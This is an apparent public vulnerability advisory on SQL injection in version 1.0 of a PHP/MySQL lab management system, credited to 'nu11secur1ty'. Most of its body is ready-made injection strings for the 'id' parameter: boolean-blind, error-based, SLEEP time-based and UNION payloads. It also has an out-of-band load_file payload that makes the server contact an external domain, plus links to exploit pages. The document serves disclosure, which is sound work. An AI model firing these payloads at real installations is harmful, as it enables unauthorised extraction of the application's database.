Headline
LMS PHP 1.0 SQL Injection
LMS PHP version 1.0 suffers from a remote SQL injection vulnerability.
## Title: LMS-PHP-byoretnom23-v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/28/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'was submitted in the id parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: page=user/manage_user&id=7''' AND (SELECT 1734FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=user/manage_user&id=-2854' UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/LMS-PHP-byoretnom23-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/lms-php-byoretnom23-v10-multiple-sqli.html)## Time spent:01:15:00